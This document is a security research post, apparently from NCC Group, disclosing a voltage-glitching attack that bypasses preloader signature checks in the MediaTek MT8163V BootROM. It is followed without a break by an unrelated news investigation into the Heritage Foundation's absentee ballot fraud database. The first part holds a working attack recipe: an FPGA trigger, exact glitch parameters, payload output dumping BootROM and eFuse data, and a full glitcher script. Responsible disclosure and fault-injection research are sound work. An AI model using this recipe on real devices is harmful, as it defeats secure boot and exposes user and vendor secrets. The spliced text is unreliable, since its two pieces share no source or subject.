There’s A Hole In Your SoC: Glitching The MediaTek BootROM
This research was conducted by our intern Ilya Zhuravlev, who has returned to school but will be rejoining our team after graduation, and was advised by Jeremy Boone of NCC Group’s Hardware & Embedded Systems Practice.

With the advent of affordable toolchains such as ChipWhisperer, fault injection is no longer an attack vector limited to well-funded and highly skilled adversaries. At the same time, modern devices embed more secrets than ever, and these need to be protected. Such secrets can include both encrypted user data and proprietary vendor secrets.

Voltage glitching is a type of fault injection attack in which the supply voltage of a target device is modified to induce unanticipated behavior. Typically, this involves momentarily shorting the processor’s core voltage rail to ground, which will corrupt the internal execution state of the processor. While the side-effects of glitching may be difficult to predict accurately, by observing the system’s behavior and by tuning the glitch parameters carefully, it is possible to cause the system to, for example, skip the execution of certain instructions or to corrupt data fetch operations. These types of faults can enable an adversary to bypass critical security operations performed by low level software, such as when a bootloader verifies the signature of a subsequent firmware image before passing execution control to it.

In the past, most fault injection research has focused on low power microcontrollers, such as the recent attacks on the STM32 series MCUs, NXP LPC and ESP32. Given that these types of microcontrollers are rarely seen in more powerful mobile phones or IoT devices, NCC Group sought to demonstrate that such attacks can also succeed when applied to a more complex processor.

This blog post describes NCC Group’s methodology for characterizing the boot process of the MediaTek MT8163V system-on-chip (64-bit ARM Cortex-A), as well as the design of an apparatus that is capable of reliably producing a fault injection attack against the SoC. Ultimately, our results show that the MediaTek BootROM is susceptible to glitching, allowing an adversary to bypass signature verification of the preloader. This circumvents all secure boot functionality and enables the execution of unsigned preloader images, completely undermining the hardware root of trust.

Our work focused specifically on the MT8163V chipset, and we did not attempt this exploit against more recent variants of the SoC. However, we are aware that many MediaTek SoCs share the same BootROM-to-preloader execution flow. Our (as yet untested) suspicion is that this vulnerability impacts other MediaTek SoCs that are currently on the market. Given the prevalence of this platform, it would follow that this vulnerability affects a wide variety of embedded devices that use MediaTek chips, including tablets, smart phones, home networking products, IoT devices, and more.

Because this vulnerability manifests in the mask ROM, the issue cannot be patched in affected in-field products. The severity of this issue, however, depends highly on the product threat model. Voltage glitching attacks require physical access to the target device, so the risk is highest in threat models where physical access is assumed, such as with mobile devices that are routinely lost or stolen. Conversely, deployments that deny attackers physical access warrant a suitable reduction in concern.

Selected Hardware Target

NCC Group selected a popular tablet device which uses the MediaTek MT8163V system-on-a-chip. The target was chosen based on its price, wide availability, and the fact that the PCB has many exposed and labelled test points. This simplified the circuit board reverse engineering process and made it easier to probe and glitch the board.

MediaTek Boot Process

Many MediaTek mobile and tablet SoCs follow a common boot process, as shown by the following figure. Our fault injection attack is designed to target the BootROM as it is loading and verifying the preloader executable.

MediaTek boot process

The BootROM is the immutable first stage in the boot process, and serves as the hardware root of trust for the SoC. As is typical, these SoCs contain an efuse bank that can be configured during OEM device manufacturing in order to enable secure boot and to specify the hash of the preloader signing certificate. During startup, the BootROM will read these fuses to determine the configured secure boot policy. Next, the BootROM will load the preloader from eMMC into RAM and will verify its signature before executing it.

MediaTek’s preloader is the second stage in the boot process and is the first mutable code. The preloader is stored on the BOOT0 eMMC partition. As described in section 7.2 of the eMMC specification, the boot partitions are special hardware partitions, separate from the main user data partition.

eMMC partitions

Boot Process Flow

The MediaTek SoC stores two copies of the preloader in BOOT0. If the first image is corrupt (i.e. doesn’t pass the signature verification check), then the BootROM will load the second image. If both copies are corrupt, then the BootROM will enter Download Mode, as indicated by the string “[DL] 00009C40 00000000 010701” being sent over the UART.
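This dual-image fallback can be sketched as follows. A minimal Python sketch of the decision logic described above; the function and parameter names are ours, not MediaTek’s:

```python
def select_preloader(images, verify):
    """Return the first BOOT0 preloader copy that passes verification.

    The BootROM tries the first copy, falls back to the second, and enters
    Download Mode (None here, "[DL] ..." on UART) if both copies fail."""
    for img in images:
        if verify(img):
            return img
    return None  # BootROM enters Download Mode
```

An attacker only needs one of the two verification attempts to be glitched successfully, which is why both copies can hold the same tampered image.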

In order to load the preloader from flash into RAM, the eMMC boot mode feature is used. Instead of sending individual READ commands, the BootROM resets the eMMC into this “alternative boot mode”. This is accomplished by sending two GO_IDLE_STATE (CMD0) commands: first with argument of 0xF0F0F0F0 which puts the card into the “pre-idle” state, then with 0xFFFFFFFA which puts it into the boot state.

GO_IDLE_STATE commands to initiate reading of BOOT0

After receiving the second command, the eMMC starts transmitting the contents of the BOOT0 partition over the DAT0 line in 1-bit mode. It takes about 100ms to receive the whole partition contents.
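The state transitions driven by these two GO_IDLE_STATE arguments can be modeled as a small state machine. This is an illustrative sketch based on the sequence described above; state names and the helper function are our own:

```python
# CMD0 (GO_IDLE_STATE) arguments used to enter eMMC alternative boot mode
GO_IDLE_ARG_PRE_IDLE = 0xF0F0F0F0
GO_IDLE_ARG_BOOT = 0xFFFFFFFA

def cmd0_transition(state, arg):
    """Return the card state after a GO_IDLE_STATE (CMD0) with argument 'arg'."""
    if arg == GO_IDLE_ARG_PRE_IDLE:
        return "pre-idle"
    if arg == GO_IDLE_ARG_BOOT and state == "pre-idle":
        return "boot"   # card streams the BOOT0 partition over DAT0
    return "idle"       # any other CMD0 acts as a plain reset
```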

Transmission of BOOT0 partition contents

Once the BootROM has received the entirety of the first preloader image from the BOOT0 partition, the process is interrupted by sending a GO_IDLE_STATE reset command.

GO_IDLE_STATE command to stop BOOT0 reading

If the first preloader image is valid, our observations show that it takes about 2 seconds between when the final bytes of the preloader are transmitted and when the first eMMC command issued by the preloader is observed.

Logic analyzer capture demonstrating this 2s window (first preloader is valid)

On the other hand, if the first preloader image is invalid (that is, it fails signature verification), then this process is repeated. However, now the BootROM does not send a reset command until after the second copy of the preloader is received. In this case, it takes only about 700ms between the BootROM attempting to load the first and the second preloader images.

Logic analyzer capture demonstrating this 700ms window (first preloader is invalid)

Therefore, we assume that during the first ~700ms, the BootROM is busy parsing the preloader image structure and performing signature validation, and that the following 1.2s of execution is largely the preloader initialization code. For that reason, NCC Group decided that the voltage glitch attack should target the first 700ms window after the preloader is read from eMMC.

FPGA Trigger Setup

In order to inject a voltage glitch with precise timing, a custom trigger was implemented using an inexpensive FPGA (Sipeed Tang Nano). The FPGA is connected to the eMMC CLK and DAT0 lines (while the CMD pin is also connected in the picture, it was only used for debugging with a logic analyzer).

FPGA connected to test points on the tablet

While the logic level of the FPGA is 3.3V by default, it is also able to work with 1.8V inputs without any board modifications. The output of the FPGA is a 3.3V trigger signal and is connected to the ChipWhisperer trigger input pin.

The Verilog trigger code is extremely simple: the FPGA is clocked by the eMMC clock signal and the code implements a shift register using DAT0 to keep track of the last 4 bytes transferred over the line. When the desired pattern is observed, a trigger output signal is generated for 512 eMMC clock cycles:

always @(posedge emmc_clk or negedge sys_rst_n) begin
    if (!sys_rst_n) begin
        trigger <= 1'b0;
        counter <= 24'b1000000000;  // = 512 clock cycles
        capture <= 32'b0;
    end else if (counter > 0) begin
        // Hold the trigger output for the remaining cycles
        counter <= counter - 1;
        capture <= 32'b0;
    end else if (capture == 32'h4ebbc04d) begin
        // Pattern matched: assert trigger for 512 eMMC clock cycles
        trigger <= 1'b1;
        counter <= 24'b1000000000;
    end else begin
        trigger <= 1'b0;
        capture <= {capture[30:0], emmc_dat0};  // shift in the next DAT0 bit
    end
end

The pattern being matched, 4e bb c0 4d, consists of the four bytes located near the end of the first copy of the preloader:

Hex dump of the preloader
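Given a dump of the preloader, the location of this pattern can be checked in software before synthesizing it into the FPGA. A small sketch (helper name is ours):

```python
# The 4-byte sequence the Verilog shift register fires on
TRIGGER_PATTERN = bytes.fromhex("4ebbc04d")

def find_trigger_offset(image: bytes) -> int:
    """Return the byte offset of the trigger pattern within a preloader dump."""
    off = image.find(TRIGGER_PATTERN)
    if off < 0:
        raise ValueError("trigger pattern not present in image")
    return off
```

Choosing a pattern near the end of the first preloader copy places the trigger as close as possible to the start of the signature-check window.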

The trigger output signal is then fed to the ChipWhisperer where a delay is inserted and a glitch of a specific width is generated.

Glitch Target

The ChipWhisperer platform is used to introduce voltage glitches when the FPGA trigger activates.

SMA connector on the tablet wired to test pad

An SMA connector was soldered to the side of the tablet circuit board and then connected through a wire to the target pad: VCCK_PMU. The glitch shorts VCCK_PMU to ground through ChipWhisperer’s low-power MOSFET. By dropping the core voltage for a very short period of time, we expect to corrupt the internal state of the processor (such as register values) without completely crashing the whole system. In order to access the VCCK_PMU pad, a portion of soldermask was scratched off the PCB with a knife. No other board modifications were performed (i.e. we did not find it necessary to remove decoupling capacitors, as is sometimes required).

Overall Setup

The overall setup of the glitching apparatus and its connections are shown in the following diagram.

Glitching apparatus block diagram

The following hardware was used to perform the attack:

  • 1.8v UART: A UART adapter which uses 1.8v logic level. This is used so that we can see target output and determine when a glitch attempt has succeeded ($2 USD).
  • RaspberryPi: Used to programmatically reset the target device by disabling and re-enabling USB power with uhubctl ($50 CAD, CanaKit).
  • FPGA: Passively listens to eMMC traffic and outputs glitch trigger signal to ChipWhisperer ($10 CAD, Digikey).
  • ChipWhisperer: Inserts voltage glitches after the trigger signal is activated ($325 USD, NewAE Technology).

Determining The Initial Glitch Parameters

The following parameters were used to set up the ChipWhisperer glitch:

scope.glitch.clk_src = "clkgen"
scope.glitch.output = "enable_only"
scope.glitch.trigger_src = "ext_single"
scope.clock.clkgen_freq = 16000000
scope.io.glitch_lp = True
scope.io.glitch_hp = False

Next, it was necessary to determine the target glitch width. To accomplish this, glitches of different widths were manually injected while the device was executing in the BootROM and preloader. Glitch widths of around 80-100 clock cycles were observed to introduce various types of state corruption in the preloader. However, many of these state corruptions did not appear to be exploitable. For example, the following output was observed during one of the iterations:

[2176] [PART] check_part_overlapped done
[2180] [PART] load "tee1" from 0x0000000000B00200 (dev) to 0x43001000 (mem) [SUCCESS] 
[2181] [PART] load speed: 15000KB/s, 46080 bytes, 3ms
[2213] [platform] ERROR: <ASSERT> div0.c:line 41 0 
[2213] [platform] ERROR: PL fatal error... 
[2214] [platform] PL delay for Long Press Reboot

Bruteforcing the Correct Glitch Parameters

As stated previously, we assumed that the signature check occurs within the 700ms window after the final GO_IDLE_STATE command. In order to cover the whole 700ms of timing, a gradual bruteforce approach was used.

First, an unmodified and properly signed preloader was loaded into the eMMC BOOT0 partition. Then, a coarse bruteforce was performed in the offset range [25400, 100000] with a step size of 200 cycles. The assumption was that a useful glitch offset would cause the device either to crash (no output seen on UART), or be put in DL mode (“[DL] 00009C40 00000000 010701” output string observed on the UART).

Through this experimentation process, we determined that most of the attempted offsets resulted in no apparent change in device behavior, and the preloader was loaded and ran as normal. However, after several hours of running this first-stage bruteforce, multiple areas of interest were identified and a more granular bruteforce was applied to them. This fine-grained approach used step values of 20 cycles instead of 200 cycles.
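The coarse-then-fine offset search described above can be sketched as follows (parameters are taken from the text; the helper names are ours, not part of the ChipWhisperer API):

```python
def coarse_offsets(start=25400, stop=100000, step=200):
    """First-stage sweep: candidate glitch offsets at a 200-cycle step."""
    return range(start, stop, step)

def fine_offsets(center, span=200, step=20):
    """Second-stage sweep: refine around an interesting coarse hit
    with a 10x smaller step, covering one coarse step on either side."""
    return range(center - span, center + span + 1, step)
```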

At this point, NCC Group tampered with the preloader image by modifying a debug string. The BootROM should refuse to load this tampered image due to a failed signature check; we therefore know a glitch was successful whenever the tampered image is loaded and executed. NCC Group once again identified areas of interest and continued bruteforcing the glitch parameters. After about 2 hours of bruteforce, several successful glitches were confirmed. However, these successes were unreliable, and more fine tuning was needed.

Next, the bruteforce was fine-tuned around these specific offsets and widths to discover the optimal glitch parameters. With the proper parameters, and several days' worth of bruteforce, we were able to achieve a 15-20% success rate for bypassing the signature check. The following table summarizes the statistical output from these runs, demonstrating that multiple sets of parameters (width and offset) were able to achieve a successful glitch.

Width Offset Success Run Total Runs Success Rate
94 41428 122 802 15.21%
93 41430 154 802 19.20%
94 41431 156 803 19.43%
127 41431 176 803 21.92%
129 41431 167 803 20.80%
93 41432 182 803 22.67%
115 41432 168 803 20.92%
117 41432 188 802 23.44%
126 41432 161 802 20.07%
130 41432 181 803 22.54%
117 41433 180 803 22.42%
118 41433 178 802 22.19%
129 41433 158 802 19.70%
100 41434 147 803 18.31%
103 41434 162 803 20.17%
104 41434 163 803 20.30%
128 41434 180 803 22.42%
129 41434 169 802 21.07%
130 41434 176 803 21.92%
103 41435 157 803 19.55%
104 41435 187 803 23.29%
126 41435 167 803 20.80%
128 41435 161 803 20.05%
100 41436 160 803 19.93%
102 41436 169 802 21.07%
100 41437 160 803 19.93%
102 41438 158 803 19.68%
103 41438 157 803 19.55%
104 41438 147 802 18.33%

Notice that all successful glitches are clustered in a narrow range of widths (93-130) and offsets (41428-41438). These values can be used with the provided ChipWhisperer script at the end of this blog post.
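The per-parameter statistics in the table can be computed from raw bruteforce logs with a few lines of Python. This is an illustrative sketch; the input tuple format is a hypothetical log representation, not output from our glitcher script:

```python
from collections import defaultdict

def success_rates(runs):
    """Aggregate success rates per (width, offset) pair.

    runs: iterable of (width, offset, succeeded) tuples, one per glitch attempt.
    Returns a dict mapping (width, offset) -> fraction of successful attempts."""
    tally = defaultdict(lambda: [0, 0])  # (width, offset) -> [successes, total]
    for width, offset, ok in runs:
        entry = tally[(width, offset)]
        entry[1] += 1
        if ok:
            entry[0] += 1
    return {k: wins / total for k, (wins, total) in tally.items()}
```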

Payload Execution

Beyond simply tampering with a debug string, our goal is to execute arbitrary code. So next, a payload was injected into the preloader binary, replacing a portion of the string section. The preloader was also modified to jump to the payload around where it would normally perform GPT parsing. The specific place, located in the later stage of the preloader, was chosen because after the glitch has succeeded, the UART has to be reconfigured with different baud rate parameters, which takes some time and results in early output from the preloader being lost.

The injected payload will print a log message and then read out BootROM memory and EFUSE contents. A successful glitch attempt is shown in the UART output below:

Dry run 
Dry run done, go!
105 41431 b'\x00[DL] 00009C40 00000000 010701\n\r' 
105 41433 b'\x00' 
99 41432 b'\x00\n\rF0: 102B 0000\n\rF3: 4000 0036\n\rF3: 0000 0000\n\rV0: 0000 0000 [0001]\n\r00: 0007 4000\n\r01: 0000 0000\n\rBP: 0000 0209 [0000]\n\rG0: 0190 0000\n\rT0: 0000 038B [000F]\n\rJump to BL\n\r\n\r\xfd\xf0' 
Glitched after 10.936420202255249s, reopening serial!

<snip>

[1167] [Dram_Buffer] dram_buf_t size: 0x1789C0
[1167] [Dram_Buffer] part_hdr_t size: 0x200
[1168] [Dram_Buffer] g_dram_buf start addr: 0x4BE00000
[1169] [Dram_Buffer] g_dram_buf->msdc_gpd_pool start addr: 0x4BF787C0
[1169] [Dram_Buffer] g_dram_buf->msdc_bd_pool start addr: 0x4BF788C0
[1187] [RAM_CONSOLE] sram(0x12C000) sig 0x0 mismatch
[1188] [RAM_CONSOLE] start: 0x44400000, size: 0x10000
[1188] [RAM_CONSOLE] sig: 0x43074244
[1189] [RAM_CONSOLE] off_pl: 0x40
[1189] [RAM_CONSOLE] off_lpl: 0x80
[1189] [RAM_CONSOLE] sz_pl: 0x10
[1190] [RAM_CONSOLE] wdt status (0x0)=0x0

<snip>

———————————————————————-
MediaTek MT8163V voltage glitch proof of concept NCC Group 2020
———————————————————————-
BootROM:
00000000: 08 00 00 EA FE FF FF EA FE FF FF EA FE FF FF EA
00000010: FE FF FF EA FE FF FF EA FE FF FF EA FE FF FF EA
00000020: BB BB BB BB 38 00 20 10 00 00 A0 E3 00 10 A0 E3
00000030: 00 20 A0 E3 00 30 A0 E3 00 40 A0 E3 00 50 A0 E3
00000040: 00 60 A0 E3 00 70 A0 E3 00 80 A0 E3 00 90 A0 E3
00000050: …

EFUSE:
10206000: 11 00 0F 00 62 00 00 00 00 00 00 00 00 00 00 00
10206010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206040: 00 10 02 04 00 00 50 0C 00 00 00 00 00 00 00 00
10206050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206060: 46 08 00 00 00 00 00 00 07 00 00 00 00 00 00 00
10206070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
10206090: 47 C8 DE F6 A6 A9 A1 8B 7A 8D 71 91 06 BC 18 86
102060A0: 9F 97 E1 CD A3 7C 4C E8 AB E8 7F 60 E8 A6 FD 77
102060B0: …

 

At this point, we have shown that our glitching technique was successful and that the injected payload is able to execute arbitrary code. Although not demonstrated, it would also be possible to perform any highly-privileged operations that the preloader is normally responsible for, such as decrypting and loading a modified TrustZone image, loading a malicious LK/Android image, and so on.

Conclusion

We have demonstrated that the MediaTek MT8163V SoC is susceptible to voltage glitching attacks. Furthermore, we observed a high glitch success rate without the need for advanced setup of the glitching apparatus (e.g. clock synchronization or removing capacitors from the board). While each set of glitch parameters has an approximate 20% success rate, an adversary can trivially achieve a 100% overall success rate by simply rebooting between glitch attempts.

Because this vulnerability affects the BootROM, it cannot be patched in the field, and as-such all in-field products will remain vulnerable indefinitely. In our conversations with MediaTek leading up to this disclosure, MediaTek indicated plans to implement fault injection mitigations in the BootROM of an upcoming and unnamed SoC. We were not given the opportunity to evaluate the effectiveness of these mitigations, or whether they are hardware-based or software-based.

NCC Group serves as a strategic security advisor to many semiconductor companies, as well as companies that design and manufacture embedded devices such as smartphones or IoT products. In support of holistic security engineering, we advise our clients to consider mitigations for fault injection attacks. For voltage glitching, hardware-based mitigations, such as fast-reacting in-silicon brown-out detection circuitry, are the most effective defense. Alternatively, software-based mitigations may also be employed, though they only raise the bar for an adversary and do not completely mitigate the attack. Example software-based mitigations include:

  • Redundantly perform critical checks, terminating execution if conflicting results are produced. This mitigation forces the attacker to perform multiple successive glitches in order to bypass a single critical security check.
  • Insert random-duration delays at various points throughout security-critical code. This mitigation forces the attacker to implement multiple accurate trigger conditions.
  • Implement control flow integrity within the BootROM, especially around security critical sections of code. This mitigation may help detect when an injected fault causes the program to execute unexpected code paths, such as skipping branch instructions.
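As an illustration of the first two mitigations, here is a minimal Python sketch (real BootROM mitigations would be implemented in C or assembly; `sig_ok` is a hypothetical verification predicate):

```python
import random
import time

def glitch_hardened_verify(sig_ok, rounds=3):
    """Evaluate a verification predicate redundantly with random delays.

    A single skipped branch no longer flips the outcome: the attacker must
    glitch every round, and the random delay defeats a fixed-offset trigger.
    Conflicting results indicate an injected fault and abort execution."""
    results = []
    for _ in range(rounds):
        time.sleep(random.uniform(0, 0.001))  # random-duration delay
        results.append(bool(sig_ok()))
    if len(set(results)) != 1:
        raise RuntimeError("fault detected: inconsistent verification results")
    return results[0]
```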

For device OEMs, mitigations are more difficult. They often have limited ability to influence the glitch resistance properties implemented by their upstream silicon vendors. In this case, NCC Group recommends that device OEMs work closely with their suppliers to understand the security posture of the components. Where gaps in understanding exist, consider third-party assessments. This must be done early, during the component selection phase, so that useful comparisons among candidate vendor components can take place. Only those components that meet the security objectives and threat models of the product should be considered for use. Above the chipset level, additional layers of physical protection can help slow an attack of this nature, including careful PCB design, a wide range of anti-tamper measures, and the judicious use of cryptography to protect vital user data.

For users and consumers who are even further removed from the implementation of the BootROM, it is important to purchase devices from vendors who demonstrate a commitment to security in their products. This is particularly true for mobile devices which are easily lost or stolen, and hence vulnerable to the types of physical attacks discussed here. Lowest price too often means the least attention to the importance of security. Look for positive security traits, such as bug bounty programs, published security whitepapers, product security marks such as ioXt, regular firmware update cadence, and a general history of positively responding to publicly known security vulnerabilities.

Disclosure Timeline

  • 2020-06-16: Sent disclosure via MediaTek’s web-based reporting form.
  • 2020-07-03: Received no response, so reached out to industry contacts for assistance on contacting MediaTek PSIRT.
  • 2020-07-13: Emailed multiple MediaTek employees hoping one could redirect our inquiry to their PSIRT.
  • 2020-07-13: Received response and directed to GPG encrypt the disclosure and send to MTK’s PSIRT email alias.
  • 2020-07-14: Sent the disclosure.
  • 2020-07-15: MediaTek acknowledged receipt of disclosure.
  • 2020-07-16: MediaTek requested conference call to discuss.
  • 2020-07-23: Held conference call to discuss the vulnerability.
  • 2020-07-27: Answered additional questions about the vulnerability.
  • 2020-09-30: MediaTek requested to see the disclosure document prior to publication.
  • 2020-10-07: NCC Group provided MTK with draft advisory blog post.
  • 2020-10-15: Disclosure publication

Appendix: Glitcher Source Code

import chipwhisperer as cw
import time
import serial
import subprocess
import sys

start = time.time()

scope = cw.scope()
scope.glitch.clk_src = "clkgen"
scope.glitch.output = "enable_only"
scope.glitch.trigger_src = "ext_single"
scope.clock.clkgen_freq = 16000000
scope.io.glitch_lp = True
scope.io.glitch_hp = False

SERIAL = "/dev/ttyUSB0"
RPI = "192.168.0.18"

def power_off():
    subprocess.check_output(["ssh", "root@{}".format(RPI),
                             "/root/uhubctl/uhubctl -l 1-1 -p 2 -a 0"])

def power_on():
    subprocess.check_output(["ssh", "root@{}".format(RPI),
                             "/root/uhubctl/uhubctl -l 1-1 -p 2 -a 1"])

ser = serial.Serial(SERIAL, 115200, timeout=0.1)

print("Dry run")
power_off()
scope.glitch.repeat = 10
scope.glitch.ext_offset = 0
scope.arm()
power_on()
for x in range(10):
    data = ser.read(100000)
power_off()
print("Dry run done, go!")

def glitch_attempt(offset, width):
    power_off()
    scope.glitch.repeat = width
    scope.glitch.ext_offset = offset
    scope.arm()
    power_on()
    data = b""
    for x in range(30):
        data += ser.read(100000)
        if b"[DL]" in data and b"\n\r" in data:
            break
        if b"Jump to BL" in data and b"\n\r" in data:
            break
    print(width, offset, data)
    if b"Jump" in data:
        print("Glitched after {}s, reopening serial!\n\n".format(
            time.time() - start))
        ser.close()
        # The glitched preloader payload uses a different baud rate
        ser2 = serial.Serial(SERIAL, 921600, timeout=0.1)
        while True:
            data = ser2.read(10000)
            sys.stdout.buffer.write(data)
            sys.stdout.flush()

try:
    while True:
        for width, offset in [
            (105, 41431), (105, 41433), ( 99, 41432), (101, 41434),
            (127, 41430), (104, 41432), (134, 41431), (135, 41434),
        ]:
            glitch_attempt(offset, width)
finally:
    print("Turn off")
    power_off()
    print("Disable scope")
    scope.dis()
    print("Bye!\n")

Election

We analyzed a conservative foundation’s catalog of absentee ballot fraud. It’s not a 2020 election threat

Avatar

Published

on

By

Leila and Gary Blake didn’t want to miss elk hunting season.

It was 2000, and the election conflicted with their plans, so the Wyoming couple requested absentee ballots.

But the Blakes had moved from 372 Curtis Street five miles down the road to 1372 Curtis Street, crossing a town line. When they mailed their votes using the old address, they were criminally charged. The misdemeanor case was settled with $700 in fines and a few months’ probation, but two decades later, the Blakes are still listed as absentee ballot fraudsters in the Heritage Foundation’s Election Fraud Database.

Far from being proof of organized, large-scale vote-by-mail fraud, the Heritage database presents misleading and incomplete information that overstates the number of alleged fraud instances and includes cases where no crime was committed, an investigation by USA TODAY, Columbia Journalism Investigations and the PBS series, FRONTLINE found.

Although the list has been used to warn against a major threat of fraud, a deep look at the cases in the list shows that the vast majority put just a few votes at stake.

Fox News host Sean Hannity has repeatedly touted the Heritage Foundation's database of election fraud cases.
Fox News host Sean Hannity has repeatedly touted the Heritage Foundation’s database of election fraud cases.

The database is the result of a years-long passion project by Hans von Spakovsky, a former member of the U.S. Department of Justice during the George W. Bush administration and a senior legal fellow with the Heritage Foundation, a conservative think tank. The entire Election Fraud Database contains 1,298 entries of what the think tank describes as “proven instances of voter fraud.” It has been amplified by conservative media stars and was submitted to the White House document archives as part of a failed effort to prove that voter fraud ran rampant during the 2016 election.

But the Blakes’ address violation is typical of the kind of absentee ballot cases in the database. It appears along with widows and widowers who voted for a deceased loved one, voters confused by recent changes to the law and people never convicted of a crime.

The Heritage database does not include a single example of a concerted effort to use absentee ballot fraud to steal a major election, much less a presidential election, as President Donald Trump has suggested could happen this year. Though Trump has repeatedly claimed that absentee ballot fraud is widespread, only 207 of the entries in the Heritage database are listed under the fraudulent absentee ballot category. Not only is that a small slice of the overall Heritage database, it represents an even smaller portion of the number of local, state and national elections held since 1979, which is as far back as the database goes.

To examine the facts behind the rhetoric, reporters looked at each case in Heritage’s online category of “Fraudulent use of absentee ballots,” comparing them with state investigations, court documents and news clips. Roughly one in 10 cases involves a civil penalty and no criminal charge. Some of the cases, such as the one involving the Blakes, do not match the online definition of absentee fraud as stated by the Heritage Foundation itself. Four cases did not involve absentee ballots at all, including a 1996 murder-for-hire case that included a person persuaded to illegally vote using a wrong address.

A voter drops their ballot off during early voting, Monday, Oct. 19, 2020, in Athens, Ga.
A voter drops their ballot off during early voting, Monday, Oct. 19, 2020, in Athens, Ga.

In recent months, von Spakovsky has cited the database to warn about the dangers of voting by mail, including during podcast interviews with U.S. Rep. Dan Crenshaw and former U.S. House Speaker Newt Gingrich.

In a written response for this story, von Spakovsky — the manager of the Heritage Foundation’s Election Law Reform Initiative — called the database “factual, backed up by proof of convictions or findings by courts or government bodies in the form of reports from reputable news sources and/or court records.”

He acknowledges that the database is elastic enough to pull in civil cases, as well as criminal cases closed with no conviction. “Some suffered civil sanctions. Others suffered administrative rebukes,” von Spakovsky said. In the case of criminal convictions, the database “does not discriminate between serious and minor cases.” Charges listed in the description “add the necessary context,” he wrote.

Even with such a broad definition, the Brennan Center for Justice in its 2017 examination of the full database found scant evidence supporting claims of significant, proven fraud. It did conclude the cases added up to “a molecular fraction” of votes cast nationwide. Von Spakovsky has countered that the database is a sampling of cases that have publicly surfaced.

“We simply report cases of which we become aware,” he said.

But if the Heritage database is a sample, it points to a larger universe of cases that are just as underwhelming.

“It illustrates that almost all of the voting fraud allegations tend to be small scale, individual acts that are not calculated to change election outcomes,” said Rick Hasen, election law author and professor of law and political science at the University of California, Irvine.

To be sure, there are exceptions. In North Carolina, a Republican political consultant was indicted and the results of a 2018 congressional race overturned based on an absentee ballot operation.

“But by and large the allegations are penny-ante,” Hasen said. “Some are not crimes at all.”

Relatively small number of votes at stake

Following unsubstantiated claims that “millions and millions” of fraudulent votes cast in the 2016 election had cost him the popular vote, Trump in 2017 created the Presidential Advisory Commission on Election Integrity to investigate stories of voter fraud.

Joining the panel was von Spakovsky, whose appointment was considered controversial. In an email obtained by the Campaign Legal Center, he urged that Democrats should be barred from the task force, arguing they would obstruct the panel’s work. He also wrote, of moderate Republicans: “There aren’t any that know anything about this or who have paid attention to the issue over the years.” He submitted the Heritage database almost immediately into the commission’s official documents.

The task force disbanded seven months after its first meeting with no report substantiating fraud. The White House blamed the potential cost of lawsuits and uncooperative states for the failure to produce evidence of widespread voter fraud.

Then-Kansas Secretary of State Kris Kobach met with Trump after the presidential election to propose an investigation into voter fraud. Trump established a commission to investigate, but ultimately disbanded it without any substantiated findings of widespread voter fraud.
Then-Kansas Secretary of State Kris Kobach met with Trump after the presidential election to propose an investigation into voter fraud. Trump established a commission to investigate, but ultimately disbanded it without any substantiated findings of widespread voter fraud.

A review of the absentee cases in the Heritage Foundation database helps explain why the panel came up short, and why such fraud is not a reasonable threat to undermine the 2020 general election.

In multiple instances, only one or two votes were involved. In other cases, no fraudulent votes were involved but are still included in the database because people ran afoul of rules on helping others fill out ballots or ballot requests. For example, a nursing home worker was civilly fined $100 because she did not sign her name and address as an “assistor” on ballots she helped four elderly patients fill out. In another case, a mother was fined $200 because she signed her sons’ requests for absentee ballots.

Events in the database also can be older than they seem because Heritage frequently categorizes entries by dates of an indictment, report or conviction, which may come years after the fraud. Using the year of the incident, 137 of 207 cases occurred before 2012.

Working in bipartisan pairs, canvassers process mail-in ballots in a warehouse at the Anne Arundel County Board of Elections headquarters on October 7, 2020 in Glen Burnie, Maryland. The ballot canvass for mail-in and absentee ballots began on October 1st in Maryland, the earliest in the country. Every ballot goes through a five-step process before being sliced open and tabulated.

Overall, the total number of absentee cases in the Heritage Foundation database is 153, with 207 entries in the category because multiple people are sometimes listed for the same case. Of those cases, 39 of them — involving 66 people — represent cases in which there seemed to be an organized attempt to tip an election, based on reporting and the group’s own description.

Further, the database describes “cases,” not individuals charged. However, the total number of cases became inflated after Heritage began counting every person involved in a criminal ring as a separate case.

“Each individual is a separate case and involved different … acts of voter fraud,” even if the parties conspired, von Spakovsky said. The Heritage Foundation may reconsider how groups of defendants are counted, but if anything, he said, the number of cases is undercounted, not overcounted.

But the details of the cases compiled in the database undermine the claim that voter fraud is a threat to election integrity.

In Seattle, an elderly widow and a widower appeared in court the same day, having voted for their recently deceased spouses — two of 15 in the database where an individual cast the ballot of a recently deceased parent, wife or husband. “The motivation in these cases was not to throw an election,” the prosecutor of the Seattle case told the Seattle Post-Intelligencer. “The defendants are good and honorable people.”

Lorraine Minnite, a Rutgers University political science professor who has written extensively on voter behavior, said of the Heritage Foundation database: “They slapped it together.

“They must have thought people would not think about it in a deep way,” Minnite said. “They can just slam it on the desk, say some number. The context and accuracy goes out the window.”

Signage for ballots with errors is seen in a warehouse at the Anne Arundel County Board of Elections headquarters on October 7, 2020 in Glen Burnie, Maryland. The ballot canvass for mail-in and absentee ballots began on October 1st in Maryland, the earliest in the country. Every ballot goes through a five-step process before being sliced open and tabulated.

Andrea “Andy” Bierstedt was accused of taking one ballot belonging to another voter to the post office in a 2010 Texas sheriff’s race. Campos said prosecutors allowed her to donate $3,500 to the county food bank as part of a plea. She wrote the check and she has no conviction. Yet she’s in the database.

“This database is really saying that I’m guilty when even the courts say I’m not guilty,” said Bierstedt, who did not know her name was on a compilation of voter fraud cases. “It’s slander.”

Others captured in the database stumbled on changes in law. Providing assistance, such as the delivery of an absentee ballot, had been legal in 2003 in Texas, and in 2004, that’s what Hardeman County Commission candidate Johnny Akers did. “I didn’t understand you couldn’t mail some little old lady’s ballot,” Akers told the Wichita Falls Times Record News.

After Brandon Dean won the Brighton, Alabama, 2016 mayor’s race, a losing candidate sued over absentee ballots.

“This isn’t about voting fraud,” the judge in the civil trial said. Ballots rejected by the judge for apparent voter mistakes triggered a runoff, and Dean declined to run.

Dean’s case, however, appears in the Heritage database.

